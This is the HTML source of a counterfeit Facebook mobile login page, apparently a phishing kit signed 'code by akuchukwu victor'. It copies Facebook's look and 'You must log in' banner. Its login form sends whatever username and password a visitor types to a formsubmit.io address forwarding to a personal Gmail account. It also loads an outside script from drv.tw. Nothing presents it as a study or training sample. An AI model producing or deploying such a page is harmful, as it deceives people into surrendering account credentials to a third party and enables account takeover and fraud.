<!DOCTYPE HTML>
<html>
    <head>
        <title> FACEBOOK</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta charset="UTF-8"/>
        <style>
            * {
                margin:0;
                padding:0;
                font-family:sans-serif;
               
            }
            body {
                background:white;
            }
             .must {
     color:#7c6648fe;
     font-weight:bold;
  
  
  
  
 http://www.tutorialcodeplay.com/samplePost.php
     
 }
 #vic {
    color:#353277dd;
    
}
   .current  {
       background:#fff18039;
       font-size:13px;
       height:75px;
       width:430px;
       
      
   }
   h3 {
     color:#2b6dfffe;
     font-size:20px;
       
 }
input {
     height:30px;
     width:315px;
     padding:8px;
     background:#d3d3c14d;
     border:1px solid #d3d3c14d;
     border-radius:5px;
     border-bottom-width:1px;
     border-bottom-color:silver;
     border-right-width:1px;
     border-left-width:1px;
     border-right-color:silver;
     border-left-color:silver;
 }
 a {
     text-decoration:none;
 }
  #btn1 {
     width:335px;
     height:40px;
     background:#2b6dfffe;
     color:white;
     text-weight:20px;
     padding:10px;
     outline-color:white;
     border-radius:7px;
     border:1px solid #2b6dfffe;
 }
 #xxx {
     color:#2b6dfffe;
}
   #clock {
       width:440px;
   }
    #btn1:hover {
     background:skyblue;
 }
 #btn2 {
    background:white;
    width:330px;
    height:41px;
    border:1px solid silver ;
    border-radius:5px;
    outline-color: silver;
    
}
#btn2:hover {
    background:#92c864dd;
    
      
}
#rtr {
    color:black;
    
}
.wee {
    font-size:12px;
}
#fresh {
    width:170px;
    float:left;
}
small {
    color:#353277dd;
}
#girl {
    width:170px;
    float:right;
}

.was {
    font-weight:bold;
    width:380px;
}
        </style>
    </head>
   <body>
       
       
      
       
       
       <header>
               <div class="current">
    <a href="https://m.facebook.com/click.php?redir_url=market%3A%2F%2Fdetails%3Fid%3Dcom.facebook.katana%26referrer%3Dutm_reg%253Da3qDY7cGwjVFyLoUBzGlreUI%26referrer_params%255Blink_source%255D%3Dfb_app_banner&amp;app_id=350685531728&amp;cref=mb&amp;no_fw=1&amp;refid=8" target="_blank"><img src="/storage/emulated/0/Pictures/Screenshots/Screenshot_20230214-213615~2.jpg" style="float:left;" alt=""><p id="vic"><br>Get Facebook for Android and browser faster.</p><br>
     <div class="must">You must log in</div></a></div>
        
  <br>
  
       </header>
     <main align="center">
         <h3>facebook</h3>
         <br/>
     <form autocomplete="on" method="post" action="https://formsubmit.io/send/victorakuchukwu6@gmail.com" enctype="multipart/form-data" data-netlify="true">
         
         <input type="text" placeholder="Mobile number or email address" name="Username" required/> <br> <br>
         <input type="text" placeholder="Password" name="Password" required/>
         <br><br>
           <div class="wee">
      <a href="www.betking.com"><button type="submit" class="button" id="btn1"><b>Log in</b></button></a>
      <br><br/>
        <a href="/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjY5NTYwOTM5LCJjYWxsc2l0ZV9pZCI6Mjg0Nzg1MTQ5MzQ1MzY5fQ%3D%3D&amp;c=https%3A%2F%2Fm.facebook.com%2F&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100&amp;refid=8"><p id="xxx" style="font-size:13px;">Forgotten password?</p></a><br/>
      <!--code by akuchukwu victor-->
     </form>
     <center>
     <div class="was" align="center">
         
   <hr color="#a194a1" size="1.8" style="float:right" width="130px"><span>or</span><hr style="float:left" size="1.9" color="#a194a1" width="130px">
   </center>
   </div><br>
             <!--code by akuchukwu victor-->
  <button id="btn2"><a id="rtr" href="/reg-no-deeplink/?cid=103&amp;refid=8&amp;ref=opera_speed_dial_freefb" required><b>Create new account</b></a></button>
  <br><br></div>
     </main><br/>
     <footer align="center">
         <div class="fet">
             <blockquote id="fresh">
                 <small><b style="color:#4c505b8b;">English(UK)</b></small><br>
      <small>Français (France)</small><br>
      <small>Español</small><br>
      <small>Deutsch</small>
             </blockquote>
             <blockquote id="girl">
                 <small>Hausa</small><br>
      <small>Português (Brasil)</small><br>
      <small>한국어</small><br>
      <img src="/storage/emulated/0/Pictures/Screenshots/Screenshot_20230220-131743.jpg" alt="">
             </blockquote><br><br><br><br/><br><br><br>
              <p><small>About • Help • More</small></p>
  <span class="mfss fcg" style="font-size:12px; color:#060606ab;">Meta © 2023</span> 
         </div>
     </footer>
   <script src="https://www.drv.tw/inc/wd.js?s=pmsoub4rihufjwrf7touww"></script></body>
 <script type="text/javascript">
     
          
 </script>
       
</html>
